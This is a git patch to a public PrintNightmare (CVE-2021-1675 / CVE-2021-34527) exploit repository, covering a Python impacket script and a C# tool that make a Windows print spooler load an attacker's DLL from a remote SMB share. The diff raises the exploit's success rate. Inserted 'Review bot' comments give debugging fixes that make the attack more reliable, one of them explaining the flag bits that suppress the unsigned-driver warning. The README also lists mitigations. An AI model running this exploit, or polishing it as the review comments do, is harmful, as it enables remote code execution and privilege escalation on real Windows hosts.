From 2180daa2385c9d9875ef658720516771e0f696c4 Mon Sep 17 00:00:00 2001 From: cube0x0 Date: Sat, 3 Jul 2021 13:53:46 +0200 Subject: [PATCH] C# success rate and PoC improvement Signed-off-by: cube0x0 --- CVE-2021-1675.py | 60 ++++++++++-------- README.md | 8 +-- .../.vs/SharpPrintNightmare/v16/.suo | Bin 52224 -> 0 bytes SharpPrintNightmare/README.md | 4 +- .../.vs/SharpPrintNightmare/v16/.suo | Bin 41472 -> 0 bytes .../SharpPrintNightmare/Program.cs | 16 +++-- 6 files changed, 51 insertions(+), 37 deletions(-) delete mode 100644 SharpPrintNightmare/.vs/SharpPrintNightmare/v16/.suo delete mode 100644 SharpPrintNightmare/SharpPrintNightmare/.vs/SharpPrintNightmare/v16/.suo diff --git a/CVE-2021-1675.py b/CVE-2021-1675.py index 7f5d527..1807985 100644 --- a/CVE-2021-1675.py +++ b/CVE-2021-1675.py @@ -5,7 +5,6 @@ from impacket.dcerpc.v5.dtypes import NULL from impacket.structure import Structure import argparse import sys -import time import pathlib #https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/2825d22e-c5a5-47cd-a216-3e903fd6e030 @@ -67,23 +66,7 @@ def getDrivers(dce, handle=NULL): return blob -def main(username, password, domain, lmhash, nthash, address, port, share): - #connect - dce = connect(username, password, domain, lmhash, nthash, address, port) - #handle = "\\\\{0}\x00".format(address) - handle = NULL - - #find "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL" path - try: - blob = getDrivers(dce, handle) - pDriverPath = str(pathlib.PureWindowsPath(blob['DriverPathArray']).parent) + '\\UNIDRV.DLL' - except Exception as e: - print('[-] Failed to enumerate remote pDriverPath') - print(str(e)) - sys.exit(1) - - print("[+] pDriverPath Found {0}".format(pDriverPath)) - +def main(dce, pDriverPath, share): #build DRIVER_CONTAINER package container_info = rprn.DRIVER_CONTAINER() container_info['Level'] = 2 
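Review bot: The new `def main(dce, pDriverPath, share):` drops the `handle = NULL` binding that the old body had, yet the function still passes `pName=handle` to `hRpcAddPrinterDriverEx` further down, so `handle` now resolves only through the module global that the `__main__` block happens to set; importing this file and calling `main()` raises NameError. Make the dependency explicit and keep callers working with `def main(dce, pDriverPath, share, handle=NULL):` (`NULL` is already imported from `impacket.dcerpc.v5.dtypes`). The body of `main` continues past the end of this hunk.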
@@ -93,14 +76,15 @@ def main(username, password, domain, lmhash, nthash, address, port, share): container_info['DriverInfo']['Level2']['pEnvironment'] = "Windows x64\x00" container_info['DriverInfo']['Level2']['pDriverPath'] = pDriverPath + '\x00' container_info['DriverInfo']['Level2']['pDataFile'] = "{0}\x00".format(share) - container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\kernelbase.dll\x00" - + container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\winhttp.dll\x00" + flags = rprn.APD_COPY_ALL_FILES | 0x10 | 0x8000 filename = share.split("\\")[-1] - print("[*] Executing {0}".format(share)) resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) print("[*] Stage0: {0}".format(resp['ErrorCode'])) + + container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\kernelbase.dll\x00" for i in range(1, 30): try: container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\{0}\\{1}\x00".format(i, filename) 
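Review bot: The added `container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\kernelbase.dll\x00"` after Stage0 is dead: the very first statement inside the `for i in range(1, 30)` loop overwrites `pConfigFile` with the `...\\3\\old\\{i}\\{filename}` path, so kernelbase.dll is never sent in any request. Either delete the line or, if the intent is a distinct Stage1 request before the `old\\N` probing, issue the call before the loop. Unrelated but in the same lines, `flags = rprn.APD_COPY_ALL_FILES | 0x10 | 0x8000` deserves a comment naming the bits — MS-RPRN calls them APD_COPY_FROM_DIRECTORY (0x10) and APD_INSTALL_WARNED_DRIVER (0x8000) — so a reader knows why the unsigned-driver warning is being suppressed. Also, `resp['ErrorCode']` from Stage0 is printed but never acted on, so an access-denied or RPC fault still leads into 29 more requests. `main` starts before and ends after this hunk.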
@@ -118,9 +102,11 @@ if __name__ == '__main__': parser = argparse.ArgumentParser(add_help = True, description = "CVE-2021-1675 implementation.",formatter_class=argparse.RawDescriptionHelpFormatter,epilog=""" Example; ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\\\192.168.1.215\\smb\\addCube.dll' +./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\\\192.168.1.215\smb\\addCube.dll' 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL' """) parser.add_argument('target', action='store', help='[[domain/]username[:password]@]') parser.add_argument('share', action='store', help='Path to DLL. Example \'\\\\10.10.10.10\\share\\evil.dll\'') + parser.add_argument('pDriverPath', action='store', help='Driver path. Example \'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL\'', nargs="?") group = parser.add_argument_group('authentication') group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH') group = parser.add_argument_group('connection') 
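Review bot: The new epilog example line contains `\smb` with a single backslash inside a non-raw triple-quoted string; `\s` is not a valid Python escape, so CPython emits a DeprecationWarning (SyntaxWarning on newer releases) at compile time, and the rendered help shows a path that differs from the previous example line. Use the same doubled form as the line above it: `'\\\\192.168.1.215\\smb\\addCube.dll'`. The new optional positional `pDriverPath` with `nargs="?"` is fine as long as the help text says what happens when it is omitted; consider appending `(default: auto-detect via RpcEnumPrinterDrivers)` to its help string.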
@@ -161,12 +147,34 @@ Example; lmhash = '' nthash = '' + #connect + dce = connect(username, password, domain, lmhash, nthash, options.target_ip, options.port) + #handle = "\\\\{0}\x00".format(address) + handle = NULL + + #find "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL" path + if not options.pDriverPath: + try: + blob = getDrivers(dce, handle) + pDriverPath = str(pathlib.PureWindowsPath(blob['DriverPathArray']).parent) + '\\UNIDRV.DLL' + if not "filerepository" in pDriverPath: + print("[-] pDriverPath {0}, expected :\\Windows\\System32\\DriverStore\\FileRepository\\.....".format(pDriverPath)) + print("[-] Specify pDriverPath manually") + sys.exit(1) + except Exception as e: + print('[-] Failed to enumerate remote pDriverPath') + print(str(e)) + sys.exit(1) + else: + pDriverPath = options.pDriverPath + + print("[+] pDriverPath Found {0}".format(pDriverPath)) + print("[*] Executing {0}".format(options.share)) + #re-run if stage0/stageX fails print("[*] Try 1...") - main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share) - time.sleep(10) + main(dce, pDriverPath, options.share) print("[*] Try 2...") - main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share) - time.sleep(10) + main(dce, pDriverPath,options.share) print("[*] Try 3...") - main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share) \ No newline at end of file + main(dce, pDriverPath,options.share) \ No newline at end of file diff --git a/README.md b/README.md index 70d1568..5b7885d 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,4 @@ -# CVE-2021-1675 +# CVE-2021-1675 / CVE-2021-34527 Impacket implementation of the [PrintNightmare ](https://github.com/afwu/PrintNightmare) PoC originally created by Zhiniang Peng (@edwardzpeng) & Xuefeng Li (@lxf02942370) 
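Review bot: The new sanity check `if not "filerepository" in pDriverPath:` is case-sensitive, but `pDriverPath` is built from the path the remote spooler returns via `pathlib.PureWindowsPath(...)`, which preserves the stored casing; a standard `C:\Windows\System32\DriverStore\FileRepository\...` path therefore fails the test and the script exits with "Specify pDriverPath manually" even though auto-detection succeeded. Change it to `if "filerepository" not in pDriverPath.lower():` (also the idiomatic `not in` form). The `sys.exit(1)` inside the `try` is fine since `SystemExit` is not caught by `except Exception`. Note that the three `main(...)` retries now reuse one `dce` binding, so a fault that tears down the connection in try 1 will surface as an unrelated error in tries 2 and 3; a short comment above `print("[*] Try 1...")` saying the retries are intentional and share the session would help the next reader.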
@@ -86,9 +86,9 @@ REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_ ### Scanning -We can use `rpcdump.py` from impacket to scan for vulnerable hosts, if it returns a value, it's vulnerable +We can use `rpcdump.py` from impacket to scan for potential vulnerable hosts, if it returns a value, it could be vulnerable -``` +```bash rpcdump.py @192.168.1.10 | grep MS-RPRN Protocol: [MS-RPRN]: Print System Remote Protocol @@ -100,7 +100,7 @@ Disable Spooler service ```powershell Stop-Service Spooler -REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Spooler" /v "Start " /t REG_DWORD /d "4" /f +REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Spooler" /v "Start" /t REG_DWORD /d "4" /f ``` Or Uninstall Print-Services 
diff --git a/SharpPrintNightmare/.vs/SharpPrintNightmare/v16/.suo b/SharpPrintNightmare/.vs/SharpPrintNightmare/v16/.suo deleted file mode 100644 index aad948ebd15e10f0d6e844b8b9993380a000f9a0..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 52224 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 maNg{*P}r>c--hWbN|*dM@WA{{R26B;pSM diff --git a/SharpPrintNightmare/README.md b/SharpPrintNightmare/README.md index 0350366..28f743d 100644 --- a/SharpPrintNightmare/README.md +++ b/SharpPrintNightmare/README.md 
@@ -1,7 +1,9 @@ -# C# Implementation of CVE-2021-1675 +# C# Implementation of CVE-2021-1675 / CVE-2021-34527 ### Usage +The RCE functionality might need to be executed with local administrator privileges on YOUR machine. + ``` #LPE C:\SharpPrintNightmare.exe C:\addCube.dll 
diff --git a/SharpPrintNightmare/SharpPrintNightmare/.vs/SharpPrintNightmare/v16/.suo b/SharpPrintNightmare/SharpPrintNightmare/.vs/SharpPrintNightmare/v16/.suo deleted file mode 100644 index ce63ce0ea8451d1e214f163aa63443e2968741e0..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 41472 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 i>pCN?&i` 2) { path = args[2]; 
@@ -117,13 +121,11 @@ namespace SharpPrintNightmare //pDriverPath = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL"; // 2019 debug //pDriverPath = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_addb31f9bff9e936\\Amd64\\UNIDRV.DLL"; // 2016 debug - Console.WriteLine($"[*] pDriverPath {pDriverPath}"); - Console.WriteLine($"[*] Executing {dllpath}"); //DRIVER_INFO_2 Level2 = drivers[0]; // debug DRIVER_INFO_2 Level2 = new DRIVER_INFO_2(); Level2.cVersion = 3; - Level2.pConfigFile = "C:\\Windows\\System32\\kernelbase.dll"; + Level2.pConfigFile = "C:\\Windows\\System32\\winhttp.dll"; //replace kernelbase with winhttp Level2.pDataFile = dllpath; Level2.pDriverPath = pDriverPath; Level2.pEnvironment = "Windows x64"; @@ -141,6 +143,8 @@ namespace SharpPrintNightmare Console.WriteLine("[*] Stage 0: " + Marshal.GetLastWin32Error()); Marshal.FreeHGlobal(pnt); + //Specify a dll that does not exists in C:\\Windows\\System32\\spool\\drivers\\x64\\3\\ + Level2.pConfigFile = "C:\\Windows\\System32\\kernelbase.dll"; for (int i = 1; i <= 30; i++) { //add path to our exploit
